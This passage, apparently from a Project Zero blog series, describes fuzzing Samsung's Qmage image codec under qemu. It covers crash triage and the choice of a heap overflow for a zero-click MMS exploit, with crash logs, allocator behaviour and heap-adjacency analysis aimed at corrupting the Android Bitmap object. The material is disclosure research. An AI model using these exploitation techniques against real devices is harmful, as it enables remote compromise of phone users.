The entire fuzzing session ran with libdislocator enabled, and I believe that all identified crashes manifested real bugs in the code. At the same time, it is important to note that there are some differences between the custom and default system allocator, which may influence how easy it is to reproduce a libdislocator crash with jemalloc (also detailed in my original bug report in section "3.3. Libdislocator vs libc malloc"):
  • There is a hard 1 GB allocation limit enforced by libdislocator, which makes it easier to surface bugs related to memory pressure, but may also mask issues that require large allocations to succeed first.
  • libdislocator doesn't adhere to the same allocation alignment rules as jemalloc, meaning that it may return completely misaligned pointers (side note: it is therefore incompatible with software that uses the low pointer bits for tags). This may hide some small out-of-bounds memory accesses (1-7 bytes) on Android, if they happen to fall into the padding area. It's worth noting that the misalignment occurs only in qemu, which doesn't seem to enforce the address alignment requirement on atomic instructions such as LXDR. On Android itself, the harness does correctly align the chunks too, in order to prevent bogus SIGBUS signals being thrown.
  • libdislocator fills all new allocations with a 0xCC marker byte to improve detection of use of uninitialized memory. With jemalloc, the contents of each allocated chunk are not guaranteed to have any particular value. Controlling the bytes of a specific fresh allocation may be non-trivial or require the use of "heap massaging" techniques in practical attack scenarios.

With the custom allocator covered, we have arrived at the current form of the SkCodecFuzzer harness. It is time to look beyond it and see how we can achieve even more at the level of the qemu emulator.

Implementing a Qemu fork server

Earlier in the post, I showed how decoding a sample Qmage file with our loader under qemu takes around 380ms. A question arises, what part of it is the qemu start up time, and is there any room for optimization here? We can run a simple test and measure the run time of the loader without any arguments:

Error: missing required --input (-i) option

Usage: [LIBC_HOOKS_ENABLE=1] ./loader [OPTION]...

Required arguments:
[...]

real  0m0.360s
user  0m0.336s
sys   0m0.024s
[email protected]:~/SkCodecFuzzer/source$

It turns out that simply printing out some help and immediately exiting takes 95% of the time it takes to decode a bitmap, indicating that there is a large constant cost of starting the process, which we can try to eliminate or at least significantly reduce. There is a well known solution to this problem called fork server, and the internal Google fuzzing infrastructure supports it, including the ability to resume execution from a user-defined forkserver_main function.

Of course in this case, enabling the fork server is not as easy as flipping a configuration flag, because that would only accelerate the qemu process startup time (already quite short at 10ms). However, the bulk of the overhead (~350ms in our testing so far) comes from bootstrapping the emulated environment before the target main function is reached:

Harness execution timeline in the qemu environment

Therefore, we have to get the fork server to fork inside qemu at the point when the emulation reaches the "loader" program entrypoint (at the border of the yellow      and green      sections). Fortunately, we don't have to figure it all out on our own, as AFL already supports such a mechanism. To make it work with qemu-4.1.1 (the version I was using), I had to modify the code in two places:

  1. In the load_elf_image function in linux-user/elfload.c, to find the entry point of the loader executable, similarly to how afl_entry_point is initialized in AFL's patch.
  2. In the cpu_tb_exec function in accel/tcg/cpu-exec.c, to detect when the emulation has reached the entry point and to call into the special forkserver_main routine to activate the fork server, similarly to how the AFL_QEMU_CPU_SNIPPET2 macro executes in AFL's patch.

These two relatively simple modifications were sufficient to cause a dramatic boost of fuzzing performance. Let's look at the numbers from the servers I actually ran the fuzzing on. They're a bit slower than my workstation, so without the fork server, the loader takes on average 1160ms to decode a sample from my corpus. With the fork server, this is reduced to 56ms, which makes it a ~20.5x speed up! And it gets even better when we enable the code coverage collection (discussed in next section) and specify the -d nochain command line flag: in that setting, the average decoding times grow to 6900ms (without fork server) and 147ms (with fork server) respectively, which further widens the gap between them to a factor of ~47x. In fuzzing, the importance of such small yet crucial optimization tricks simply cannot be overstated.

Extracting code coverage – introducing QemuSanitizerCoverage

Another hugely important part of automated software testing is collecting and acting on the code coverage triggered by mutated samples. The fuzzer that I used supports reading .sancov coverage information files generated by the SanitizerCoverage instrumentation. Since the harness already pretends to be an ASAN-enabled target, why not become a SanCov-compatible one too? This is exactly the purpose of the DrSancov project, but it is based on DynamoRIO and thus can only be used with software compatible with the host CPU architecture. So, I had to "port" DrSancov to qemu, creating a mod dubbed QemuSanitizerCoverage.

I began working on the port by looking for a location in the code where the information about each executed basic block passed through. I quickly found the -d exec option (and this helpful blog post), which could be used to print out the kind of data I was interested in, but in textual form. I traced it back to the following snippet:

149:    qemu_log_mask_and_addr(CPU_LOG_EXEC, itb->pc,
150:                           "Trace %d: %p ["
151:                           TARGET_FMT_lx "/" TARGET_FMT_lx "/%#x] %s\n",
152:                           cpu->cpu_index, itb->tc.ptr,
153:                           itb->cs_base, itb->pc, itb->flags,
154:                           lookup_symbol(itb->pc));

The above code resides in the familiar cpu_tb_exec function in accel/tcg/cpu-exec.c, which I had already modified to enable the fork server. In here, I only had to add a simple call to my sancov_log_trace() callback, passing itb->pc as the only argument. The actual work happens in the callback itself: if the instruction address resides in a known library, the corresponding cell in its coverage bitmap is marked as visited; if not, the /proc/pid/maps file is parsed to find the shared object or executable. Then, right before qemu exits, the collected coverage is dumped to disk. This is how it looks in practice:

$ ASAN_OPTIONS=coverage=1 LD_LIBRARY_PATH=`pwd`/lib64 ./qemu-aarch64 -d nochain ./loader accessibility_light_easy_off.qmg 
[+] Detected image characteristics:
[+] Dimensions:      344 x 344
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[+] codec->GetAndroidPixels() completed successfully
QemuSanitizerCoverage: ./libhwui.so.1253370.sancov: 1502 PCs written
QemuSanitizerCoverage: ./libz.so.1253370.sancov: 333 PCs written
$

We get an output message similar to the one typically printed by SanitizerCoverage, which informs us that the processing of the sample Qmage file involved 1502 unique basic blocks in libhwui.so. We can take a peek at the coverage data:

$ xxd -e -g 4 libhwui.so.1253370.sancov | head -n 5
00000000: ffffff32 c0bfffff 00000d38 000010a4  2.......8.......
00000010: 000010ac 000010b0 000010b4 000010b8  ................
00000020: 000010c4 000010d8 000010e0 000011a4  ................
00000030: 000011a8 000011c0 000011cc 00001204  ................
00000040: 0006fa94 0006fac4 0006fad0 0006fadc  ................
$

There is an 8-byte header indicating the 32-bit format, followed by offsets of basic blocks relative to the start of the .text section in libhwui.so. We can convert the file to a format supported e.g. by Lighthouse and visualize the coverage or use the information directly to maintain an optimal corpus throughout the fuzzing session:

Qmage function control flow graph used for code coverage visualization

The benefits of having insight into the code coverage of a fuzzing target are well known, but I will emphasize that this feature played a key role in this project. It helped me fill in any gaps in my original input corpus, and get some degree of confidence that this highly extensive codec was tested thoroughly.

Initial file corpus

In my preparation for the first fuzzing attempt of the codec from Samsung Galaxy A50 (Android 9), there were three formats that I needed to find for my corpus: QMv1, QG1.0 and QG1.1. I was able to locate and extract a number of test cases encoded in each of them from the resources of built-in APKs in various Samsung firmwares from the 2014-2016 period, which I deemed sufficient to get myself started. Once I collected the initial data set, I ran a number of test fuzzing sessions during which the corpus continuously evolved thanks to the code coverage feedback. After a few days, it looked nothing like the original set of files: new samples were added, and most initial files were either removed or significantly mutated in the process. I was especially happy to see that a great majority of the files in the resulting corpus were minimized down to 20-50 bytes, which I attribute to the corpus management algorithm which favors shorter samples over longer ones (as described in my BH EU 2016 talk, slides 49-70).

When I learned about the existence of the new QG2.0 format in Android 10, I immediately went looking for such bitmaps in the usual place – embedded APK resources. To my surprise, I didn't find any images encoded in the new format then, and I still haven't seen any such files "in the wild" to date. This meant that I had to improvise. One of my attempts to create samples resembling the QG2.0 format was to take the existing ones in my corpus and hardcode the version in their headers to 2.0. This didn't work out very well as most such files were immediately crashing the codec (instead of hitting some deeper code paths), and I was left with only a few dozen artificial QG2.0 samples that probably didn't have very good coverage. I decided to leave the rest to the fuzzer and hope that over time, it would manage to synthesize much more interesting inputs in the new format.

I was not disappointed. Based on my measurements, after several days of fuzzing, the coverage of the QG2.0-related code paths was comparably good to the coverage of the three older formats. I will go into more detail on the numbers in a later section, but I think it is interesting to note that my December 2019 fuzzing session of the ≤ QG1.1 formats touched 18268 basic blocks in libhwui.so, while my January 2020 session of all ≤ QG2.0 formats had a coverage of 29081 blocks in the same library (and the coverage rate relative to the size of the Qmage codec was similar in both cases, at ~90%). This is a 59% increase, and it goes to show the extent of extra complexity added by Samsung in Android 10. It also seems in line with the size of the Qmage-related code in libhwui.so (mentioned in Part 1), which was 425 kB in Android 9, and 908 kB in Android 10.

As a last thought, I find it amusing how the fuzzer managed to reach the QG2.0 code paths, considering that this latest format introduces a one-byte checksum, which is verified against the length of the file size in QmageDecCommon_ParseHeader:

if (input_data[header_size - 1] != xored_bytes_of_file_length) {
  __android_log_print(ANDROID_LOG_ERROR, "QG",
                      "QmageDecCommon_ParseHeader : checksum is different!");
  return -2;
}

Even with this minor obstruction, the fuzzer managed to produce some samples that passed the check (most notably with a length of 257 bytes, which resolves to a 0x00 checksum). At the same time, the post-fuzzing corpus also contained plenty of QG1.2 files, which had me wondering for a long time, because I knew it for a fact that this version didn't exist. When I finally decided to analyze this odd behavior, everything became clear. We have already discussed in Part 1 that the version check in QmageDecCommon_VersionCheck is very permissive and it allows anything ≤ 2.0, so 1.2 passes just fine. But why this specific version? In the SkQmgCodec class, there is a field that denotes the version of the image: 0 for 1.0, 1 for 1.1 and 2 for 2.0. The way it used to be initialized (it seems to be fixed now) was as follows:

  • If version == 2.0, then internal_version = 2
  • Else if version == X.Y, then internal_version = Y

So according to this logic, QG1.2 files were equivalent to QG2.0 for all intents and purposes, except that they were easier to synthesize due to the lack of checksum verification, which is the reason so many of them wound up in my fuzzer's dynamic corpus. I probably wouldn't have come up with it myself given the non-trivial data flow in the header parsing, and it never ceases to amaze me how basic mutations paired with a coverage feedback loop can lead to such unexpected and clever results.

Mutation settings

The mutation settings I used for the fuzzing were very simple and involved five algorithms: flipping bits, randomly changing bytes, inserting "special" integers, performing arithmetic operations on the data, and cutting+pasting random continuous chunks across the input data stream. I also chained pairs of these mutators together, and occasionally invoked Radamsa. The mutation ratios ranged from 0% to 0.1%.

Results

In this section, I discuss the results of the "final" fuzzing session I ran in January 2020, which uncovered the bugs reported to Samsung in Project Zero Issue #2002.

Code coverage

In the case of Qmage, it is difficult to precisely measure the percentage coverage of code relative to the overall size of the codec, because it is just one of many parts of the libhwui.so library, and even the codec itself contains unused and non-reachable code segments that shouldn't be included in the calculations. One way to address this problem is to only count functions with non-zero coverage, assuming that there probably aren't any significant routines completely missed by the corpus. By this metric, I have achieved a 87.30% coverage of the Qmage codec. What is most important, the "heavy" functions responsible for the complex data decoding and decompression are very well covered, with all of them having a coverage rate of >60%, and a great majority being at >80%. The chart below presents the coverage percentage of 34 Qmage functions longer than 4 kB. In total, they sum up to 26670 basic blocks, 23069 of which are covered (86.50%).

Qmage per-function code coverage

On one hand, these rates can be considered a success, but on the other, it may also indicate that 13% of bugs in the code never had a chance to be triggered and are still waiting to be uncovered. That is unless Samsung and/or Quramsoft have since started doing variant analysis or fuzzing of their own, which is easier and more effective with source code access.

Crashes

Counting both the Android 9 fuzzing session and the subsequent Android 10 session, the fuzzer ran for about four weeks between December 2019 and January 2020. During this time, it identified 5218 unique crashes, where the uniqueness was defined by the three top-level stack trace entries. This number is surely bloated by some bugs which trigger with different call stacks, but still, by any standard, this is a huge number of ways to crash a library. I find it likely that the Qmage codec had never been subject to fuzzing or a manual audit before, and the prevalent lack of bound checks may even suggest that the codec was never supposed to be exposed to untrusted inputs.

Thanks to the detailed ASAN-like reports accompanying the crashes, it was easy to perform some automated triage and classify them based on the signal type, accessed address, and the instruction causing the exception. I assigned each crash to one of the following categories, sorted by descending severity:

Category
Count
Percentage
write
174
3.33%
read-memcpy
124
2.38%
read-vector
18
0.34%
read-32
3
0.06%
read-16
52
1.00%
read-8
34
0.65%
read-4
703
13.47%
read-2
393
7.53%
read-1
3322
63.66%
sigabrt
3
0.06%
null-deref
392
7.51%

The categorization is highly simplified, but it does give some overview of the types of discovered issues. The "write" crashes are the most severe, because they manifest an attempt to write data to an invalid non-zero address, which is evidence of a memory corruption condition. They are followed by invalid reads of ≥ 8 bytes and crashes in generic memory manipulation functions (memcpy), which may indicate attempts to load pointers from invalid locations, or other problems related to the handling of structures or continuous data blobs. Next we have small invalid reads (1, 2 or 4 bytes), which generally manifest simple out-of-bounds reads of the input buffer, and then "sigabrt" (memory exhaustion and likely non-exploitable stack corruption) and "null-deref" (reads or writes to near-zero addresses), both of which are relatively trivial security threats beyond some DoS attacks.

That said, assessing bugs based on their first invalid memory access is not always reliable. For example, a one-byte overread may be directly followed by a buffer overflow, or a four-byte invalid access may manifest a use-after-free condition, which is much more serious than any random out-of-bounds buffer read. And even correctly interpreting the crash reports was no trivial feat; as I noticed shortly after reporting Issue #2002, some crashes were incorrectly classified as "null-deref" even though they were caused by attempted reads of completely invalid, non-canonical addresses. The reason is that when such a wild address is accessed, the siginfo_t.si_addr field received by the signal handler doesn't accurately reflect that address, and instead contains 0x0. This made the ASAN reports look like NULL pointer dereferences and confused my triage script. The solution was to re-analyze the reports by cross-referencing si_addr with the value of the source register, and an update shown in comment #1 was sent to Samsung on the next day.

What we can infer from the summary with some certainty is that upwards of 95% of the crashes were not critical, but they were an indictment on the overall quality of the code. Specifically, the fact that there were so many "read-1" issues shows that most of the parsing in the codec is implemented at a one-byte granularity, and that there were few to no bounds checks while reading from the input stream (until May 2020). In absolute numbers, however, the quantity of the 3.33% memory corruption bugs was still horrendous in my opinion, and it offered a wide selection of options for successful exploitation.

As a last exercise, we can take a peek at the crash counts divided by the Qmage format version:

Qmage codec crashes by format version

We can see that a large number of bugs were found in the oldest QMv1 format, however it is not as useful in attacks as the rest, because it is not correctly supported in all contexts on Android. What I find most interesting here is the rising trend in the number of crashes between QG1.0, 1.1 and 2.0, likely correlated with the growing complexity of the codec. In particular, the latest QG2.0 format introduced in Android 10 added as many issues as there had been in 1.0 + 1.1 altogether! And while there was no shortage of vulnerabilities even in Android 9, the new attack surface certainly worked in my favor as a researcher looking to exploit the codec. I'll get ahead of myself and admit that I did use a flaw in the QG2.0 format in my final MMS exploit, which will be discussed in later parts of this series.

What's next?

At this point of the story, it was the beginning of February and I had just reported the crashes to Samsung. I knew that Qmage was a zero-click attack surface reachable through MMS. What's more, I ran some of the samples from the "write" category through the Gallery and My Files apps, to see if any of them would trigger any promising faults. After a few tests, I stumbled upon the following crash in logcat:

*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/d2sxx/d2s:10/QP1A.190711.020/N975FXXS1BSLD:user/release-keys'
Revision: '24'
ABI: 'arm64'
Timestamp: 2020-01-24 09:40:57+0100
pid: 31355, tid: 31386, name: thumbnail_threa  >>> com.sec.android.app.myfiles <<<
uid: 10088
signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x4a4a4a4a4a4a4a
    x0  0000006ff55dc408  x1  0000006f968eb324  x2  0000000000000001  x3  0000000000000001
    x4  4a4a4a4a4a4a4a4a  x5  0000006f968eb31d  x6  00000000000000b3  x7  00000000000000b3
    x8  0000000000000000  x9  0000000000000001  x10 0000000000000001  x11 0000000000000001
    x12 0000007090d96860  x13 0000000000000001  x14 0000000000000004  x15 0000000000000002
    x16 0000007091463000  x17 0000007090ea2d94  x18 0000006f95d1a000  x19 0000006ff5709800
    x20 00000000ffffffff  x21 0000006ff55dc408  x22 00000000000000b0  x23 0000006f968ed020
    x24 0000000000000001  x25 0000000000000001  x26 0000006f968ed020  x27 0000000000000be5
    x28 0000000000012e9a  x29 0000006f968eb370
    sp  0000006f968eb310  lr  0000007090f5f7f0  pc  004a4a4a4a4a4a4a

backtrace:
      #00 pc 004a4a4a4a4a4a4a  <unknown>
      #01 pc 00000000002e97ec  /system/lib64/libhwui.so (process_run_dec_check_buffer+92) (BuildId: fcab350692b134df9e8756643e9b06a0)
      #02 pc 00000000002ddb94  /system/lib64/libhwui.so (QmageRunLengthDecodeCheckBuffer_Rev11454_141008+1320) (BuildId: fcab350692b134df9e8756643e9b06a0)
[...]

The file explorer crashed while trying to execute code from an invalid 0x4a4a4a4a4a4a4a address, which was almost conclusive evidence that the vulnerability could be exploited to execute arbitrary code. This gave me an extra motivational boost to try to write an MMS exploit for a Samsung flagship phone with the then-latest firmware build. As someone relatively new to the Android ecosystem, it was a great opportunity for me to get better acquainted with the system's security model, existing mitigations, and the current state of the art of exploitation. In Project Zero, we often take part in such offensive exercises to put ourselves in the attacker's shoes. Our vulnerability research and exploitation development work leads to structural security improvements, and better drives our and the wider security community's defense efforts.

I had been previously able to find answers to most of my questions regarding the history and inner workings of Qmage, but trying to exploit it generated a completely new set of doubts and challenges I had to face. Some of them were familiar to me as a security engineer, but other seemed completely new:

  • Which bug(s) provided the most powerful primitives, while also being relatively easy to understand and work with?
  • What objects in memory could be reliably overwritten, and how could they be used to achieve anything useful?
  • How to remotely bypass Android ASLR in a constrained MMS environment which mostly works as a one-way communication channel?
  • How to keep the Messages app up and running despite triggering repeated crashes?

It took me a few months of experimentation and trial and error to arrive at satisfactory solutions to these problems. In the end, I managed to get all of the moving parts to work together well enough to construct the interaction-less attack. In an attempt to give some structure to the somewhat chaotic process I went through, my next blog post will focus on finding the optimal heap corruption primitive to act as the foundation of any higher-level mechanisms employed by the exploit.

MMS Exploit Part 3: Constructing the Memory Corruption Primitives

28 July 2020 at 19:50
By: Tim
Posted by Mateusz Jurczyk, Project Zero

This post is the third of a multi-part series capturing my journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices. New posts will be published as they are completed and will be linked here when complete.

Introduction

In Part 2, I discussed how I managed to fuzz-test the Qmage codec on Google infrastructure at the turn of 2019/2020. It led to the discovery of a huge number of unique crashes, many of which manifested obvious memory corruption problems. After reporting them to Samsung on 28 January 2020, my attention turned to the idea of using some of the vulnerabilities to write an MMS exploit. There was evidence that the Samsung Messages app processed incoming bitmaps without any user interaction, so this seemed like the perfect opportunity to see just how realistic such an attack could be with a wide range of image parsing bugs to choose from. The prospect of developing a zero-click exploit running over the mobile network was new and thrilling to me, and it got me very excited to take the challenge.

The first step in the process was to identify the crashes that were not just high severity on paper, but were also the most convenient for exploitation in a real-life scenario. An ideal bug would be easy to work with (i.e. require a relatively simple structure of the Qmage file), and would provide full control over the memory corruption condition. In case of a heap buffer overflow, this would imply control over the allocation size, overflow size, overflow data, and possibly even the overflow offset (in a non-linear case). Such a bug would lay a strong foundation for any higher-order mechanisms that would have to be implemented in the exploit.

This blog post describes the additional crash triage I performed to find the most suitable bug for exploitation, followed by an analysis of how it was used to turn plain memory corruption into more useful primitives: control over the instruction pointer (PC), and the ability to "probe" the existence of memory ranges. In practice, I was simultaneously experimenting with the MMS protocol to get an initial feel of its design, capabilities and limitations. However, for the sake of clarity, I will limit the scope of this write-up to the low level exploitation details, and proceed to link the memory corruption with the MMS delivery channel in future posts. Let's get started!

Heap fundamentals in Android

The first observation to make is that a great majority of the identified crashes were heap-oriented. There were some instances of stack buffer overflows, but the stack cookie mitigation rendered them non-exploitable. There were also other cases such as reads from uninitialized stack-based pointers, but they didn't seem particularly useful, so in the end, I decided to focus on the 174 "write" crashes, all of which referenced out-of-bounds heap addresses. In principle, such bugs tend to provide the most flexibility in exploitation, as they can be used to corrupt a variety of objects in memory. So, if we are going to work with the Android heap, we should get familiar with the underlying allocator and its security properties.

The allocator currently used in all modern versions of Android is jemalloc (side note: this is going to change with the introduction of Scudo in Android 11). There were two main resources that I found especially useful when learning and experimenting with jemalloc:

  • "The Shadow over Android: Heap exploitation assistance for Android’s libc allocator" at INFILTRATE 2017 (slides) and the shadow exploitation framework itself (GitHub).
  • "A Tale of Two Mallocs: On Android libc Allocators" at INFILTRATE 2018 (video), and the accompanying blog post series (specifically part 2).

I won't go into much detail regarding the internals of the allocator (you can find them in the above sources), but I would like to highlight the following properties that are most relevant to this research:

  • Determinism: jemalloc behaves deterministically, at least to the extent observable by the attacker. For example, with a clean state of the heap, two subsequent allocations of the same size are positioned next to each other.
  • Lack of inline metadata: metadata is stored separately from the allocation itself, so an overflow of one chunk (or "region", as it's called in jemalloc) immediately overwrites the data of the adjacent one, with no metadata in between.
  • Division into size classes: allocations are grouped by size, so any two allocations can only be adjacent to each other if they fall into the same size "bin".
  • Thread caches: a mechanism called "tcaches" improves locality by quickly reusing recently freed regions. This guarantees the predictability of some allocation patterns – for example, a malloc → free → malloc sequence of the same length will return the same address twice.

These characteristics can be favorable or disadvantageous depending on the specific bug and context around it. Overall, in this case, I think these properties added up to a "net positive" from the attacker's perspective, which is not great for user security. For this reason, I am really looking forward to seeing the hardened Scudo allocator enabled by default in Android 11.

Now that we have some background on the behavior we can expect from jemalloc, it's time to analyze the write-violation crashes in search of the most promising ones.

Finding the right bug

With all that we know about jemalloc, we can make a working assumption that if there are two malloc calls, and they can be made to be of a similar size, the second one can be corrupted by the first one with a forward overflow, because it is (usually) placed at a higher address. So in order to assess the usability of a crash, we need to determine:

  • What region is overwritten by the bug?
  • What are the other allocations that are requested between the overwritten allocation and the overflow, and are used after the overflow?

The SkCodecFuzzer test harness has an -l flag that enables the logging of all mallocs and frees to stderr at runtime. It can be used to match the address of the invalid memory access with the corresponding allocation, and see what other allocations are made in between. For example, if we take the signal_sigsegv_40064924d0_4336_c77562cdc52d1baed45ff05bc9ae2023.qmg sample and run it through the loader with the -l flag, we should see the following output (malloc stack traces were edited out for brevity):

[...]
[+] Detected image characteristics:
[+] Dimensions:      148 x 192
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
[DEBUG] malloc(    113664) = {0x408c0ff400 .. 0x408c11b000}
[DEBUG] malloc(       104) = {0x408c11cf98 .. 0x408c11d000}
[DEBUG] malloc(     28416) = {0x408c11e100 .. 0x408c125000}
[DEBUG] malloc(        22) = {0x408c126fea .. 0x408c127000}
[DEBUG] malloc(      4120) = {0x408c128fe8 .. 0x408c12a000}
ASAN:SIGSEGV
=================================================================
==212100==ERROR: AddressSanitizer: SEGV on unknown address 0x408c125000 (pc 0x400396c4d0 sp 0x4000d04c90 bp 0x4000d04c90 T0)
    #0 0x002b54d0 in libhwui.so (QuramQmageGrayIndexRleDecode+0xdc)
    #1 0x0029d584 in libhwui.so (__QM_WCodec_decode+0xa3c)
    #2 0x0029c9b4 in libhwui.so (Qmage_WDecodeFrame_Low_Rev14474_20150224+0x144)
    #3 0x0029ae7c in libhwui.so (QuramQmageDecodeFrame_Rev14474_20150224+0xa8)
[...]

Here, the invalid 0x408c125000 address is the same as the end of the third allocation requested after printing out the image characteristics. Its size of 28416 bytes coincides with 148 (width) × 192 (height), so we can presume that it is a pixel storage buffer and therefore has controlled length. There are two more allocations (highlighted in red) made after the overflown buffer and kept alive until the crash, so each of them could be the target of the memory corruption. In the call stack, we can also see that the problem occurs during RLE decoding, which is a well-known algorithm and thus would probably meet our criteria of being easy to work with. This is how a specific crash can be evaluated for exploitability.

Since I wished to explore the whole range of options and manually performing the same analysis on the other 173 unique "write" crashes seemed tedious, I wrote a quick bash script to generate and process the crash logs to match the invalid accessed addresses with corresponding heap regions. After sorting and deduplicating, they added up to a total of 23 unique overwritten allocation sites. I was not particularly interested in QMv1 crashes (the old format wasn't correctly handled by the Messages application), so I filtered them out from the results, leaving me with 17 allocations subject to overflow. That was a much more manageable number of cases to go through by hand.

After a brief analysis, I concluded that many of them were not optimal for my exploit, because they were temporary buffers, allocated and immediately overflown without any mallocs taking place in between. Taking advantage of such a bug would require an earlier allocation to be mapped above the buffer – a heap state that is possible, but harder to reliably achieve with the limited heap manipulation capabilities of the image codec. The remaining allocation sites that had some potential could be divided into four major groups:

Option 1: The pixel storage buffer associated with the Bitmap object, which is the #1 malloc made by the harness after parsing the headers
Example crash ID
e9e773f3e0a6d155636a52a5418d9160
Size
Controlled through the bitmap dimensions
Allocated in
SkBitmap::tryAllocPixels
Overflown by
  • QuramQumageDecoder8bit
  • QuramQumageDecoder32bit24bit
  • QuramQmageGrayIndexRleDecode
  • qme_inflate_fast (via PVcodecDecoder_zip)
Potential corruption targets
The android::Bitmap object allocated directly after, and any further allocation made by the specific codec (depending on which one is used to trigger the overflow)

Option 2: A temporary output storage buffer, which is the #3 malloc made by the harness after parsing the headers (preceded only by the bitmap object allocation), and the first allocation in the getAndroidPixels call
Example crash ID
b0749f475f0b7af444625c3d1c3a5be8
Size
Controlled through the bitmap dimensions
Allocated in
QuramQmageDecodeFrame_Rev14474_20150224
Overflown by
  • QuramQumageDecoder8bit
  • QuramQmageGrayIndexRleDecode
Potential corruption targets
  • The decoding context structure of size 1688 allocated at the beginning of QuramQumageDecoder8bit, as well as any of the numerous other allocations in that function
  • The RLE decoding context structure of size 4120 allocated in QuramQmageGrayIndexRleDecode

Option 3: A temporary RLE decoding buffer
Example crash ID
03f2d8074d5797537e8c615b2fa53cef
Size
Controlled 32-bit integer from the input stream
Allocated in
  • QmageDecodeStreamGet
  • QmageDecodeStreamGet_Rev11454_141008
  • QmageRleDecode
Overflown by
  • QmageDecodeStreamGet
  • QmageDecodeStreamGet_Rev11454_141008
  • QmageRleDecode
Potential corruption targets
The RLE decoding context structure of size 4120

Option 4: A temporary zlib decoding buffer
Example crash ID
cbd3dbc9e71b2fec9606eaa3eafce056
Size
Controlled through the bitmap dimensions
Allocated in
QuramQumageDecoder32bit24bit
Overflown by
qme_inflate (as called by QuramQumageDecoder32bit24bitDecodePrediction2dZipPVcodecDecoder_zipqme_uncompress)
Potential corruption targets
The zlib decoding context structure of size 12928

After some consideration, I decided that option 1 (bitmap pixel buffer) was the most promising one, because:

  • It was the earliest overflown malloc, making it possible to corrupt the widest range of subsequently allocated objects, including the Bitmap object.
  • The size was controlled, and in the case of RLE and zlib decompression, the overflow length and data were controlled too. On top of it, I was familiar with both algorithms and thus didn't anticipate any problems constructing the exploit files.

To be specific, I started my experimentation with the e418c0496cb1babf0eba13026f4d1504 crash and the signal_sigsegv_4005d89b74_8686_6eea0420198397cc5c97563bceb04424.qmg sample. It generated the following report (malloc stack traces again edited out):

[...]
[+] Detected image characteristics:
[+] Dimensions:      40 x 7
[+] Color type:      4
[+] Alpha type:      3
[+] Bytes per pixel: 4
malloc(      1120) = {0x408c13bba0 .. 0x408c13c000}
malloc(       104) = {0x408c13df98 .. 0x408c13e000}
malloc(        24) = {0x408c13ffe8 .. 0x408c140000}
malloc(      4120) = {0x408c141fe8 .. 0x408c143000}
ASAN:SIGSEGV
=================================================================
==3746114==ERROR: AddressSanitizer: SEGV on unknown address 0x408c13c000 (pc 0x40071feb74 sp 0x4000d0b1f0 bp 0x4000d0b1f0 T0)
    #0 0x00249b74 in libhwui.so (QuramQmageGrayIndexRleDecode+0xd8)
    #1 0x002309d8 in libhwui.so (PVcodecDecoderIndex+0x110)
    #2 0x00230854 in libhwui.so (__QM_WCodec_decode+0xe4)
    #3 0x00230544 in libhwui.so (Qmage_WDecodeFrame_Low+0x198)
    #4 0x0022c604 in libhwui.so (QuramQmageDecodeFrame+0x78)
[...]

Here, we are overflowing the 1120-byte buffer (width × height × bpp; 40 × 7 × 4 = 1120), and can corrupt the three subsequent ones marked in red. The first (104 bytes) is the Bitmap structure, the second (24 bytes) is the RLE-compressed input stream, and the third (4120 bytes) is the RLE decoder context structure. The Bitmap object sounds the most useful, and since I have already mentioned it so many times, let's finally look into it to see how it works! We'll be operating on the assumption that if we adjust the Qmage dimensions such that the pixel buffer consumes 104 bytes (e.g. 13x2), then the two allocations will likely be adjacent on Android, giving us full (linear) control over the second region.

Enter the Android Bitmap object

First of all, it is important to note that the Bitmap object created by our test harness is not exactly the same as the one used in Android, because of a difference in the allocator objects used (SkBitmap::HeapAllocator vs GraphicsJNI's HeapAllocator). This is irrelevant for fuzzing, but makes a big difference in exploit development. In order to learn about the actual object being allocated on Android, we can use a simple Frida script that hooks the heap-related functions and logs all of their invocations with stack trace. If we attach it to the com.samsung.android.messaging process and send an MMS with the proof-of-concept image, we should see output similar to the following (I demangled some symbols and edited out argument definitions for brevity):

[10036] calloc(1120, 1) => 0x7bc1e95900
    0x7cbba83684 libhwui.so!android::Bitmap::allocateHeapBitmap+0x34
    0x7cbba88b54 libhwui.so!android::Bitmap::allocateHeapBitmap+0x9c
    0x7cbd827178 libandroid_runtime.so!HeapAllocator::allocPixelRef+0x28
    0x7cbbd1ae80 libhwui.so!SkBitmap::tryAllocPixels+0x50
    0x7cbd820ae8 libandroid_runtime.so!0x187ae8
    0x7cbd81fc8c libandroid_runtime.so!0x186c8c
    0x70a04ff0 boot-framework.oat!0x2bbff0
[10036] malloc(160) => 0x7b8cd569e0
    0x7cbddd35c4 libc++.so!operator new+0x24
    0x7cbe67e608
[10036] malloc(24) => 0x7b8ca92580
    0x7cbb87baf4 libhwui.so!QuramQmageGrayIndexRleDecode+0x58
    0x7cbe67e608
[10036] calloc(1, 4120) => 0x7bc202c000
    0x7cbb89fb14 libhwui.so!init_process_run_dec+0x20
    0x7cbb87bb34 libhwui.so!QuramQmageGrayIndexRleDecode+0x98
    0x7cbb8629d4 libhwui.so!PVcodecDecoderIndex+0x10c
    0x7cbb862850 libhwui.so!__QM_WCodec_decode+0xe0
    0x7cbb862540 libhwui.so!Qmage_WDecodeFrame_Low+0x194
    0x7cbb85e600 libhwui.so!QuramQmageDecodeFrame+0x74
[...]

Here, we can again see the familiar highlighted allocations before the overflow occurs. The only difference is the size of the Bitmap object: it's 104 in our loader but 160 on Android. Unfortunately Frida didn't correctly unwind the stack for the malloc call, but based on the pixel buffer stack trace, we can figure out that it takes place in android::Bitmap::allocateHeapBitmap:

116:  sk_sp<Bitmap> Bitmap::allocateHeapBitmap(size_t size, const SkImageInfo& info, size_t rowBytes) {
117:      void* addr = calloc(size, 1);
118:      if (!addr) {
119:          return nullptr;
120:      }
121:      return sk_sp<Bitmap>(new Bitmap(addr, size, info, rowBytes));
122:  }

As expected, there is a calloc call for allocating pixel storage, followed by the creation of the Bitmap object itself. This is how the function prologue looks in Hex-Rays:

Decompiled prologue of the allocateHeapBitmap method

If we quickly change the Qmage file dimensions to 10x4, such that the pixel buffer becomes 160 (or any length between 129 and 160, which is the relevant jemalloc bin size), then we can use Frida to verify that the two Bitmap-related allocations are indeed adjacent:

[15699] calloc(160, 1) => 0x7b88feb8c0
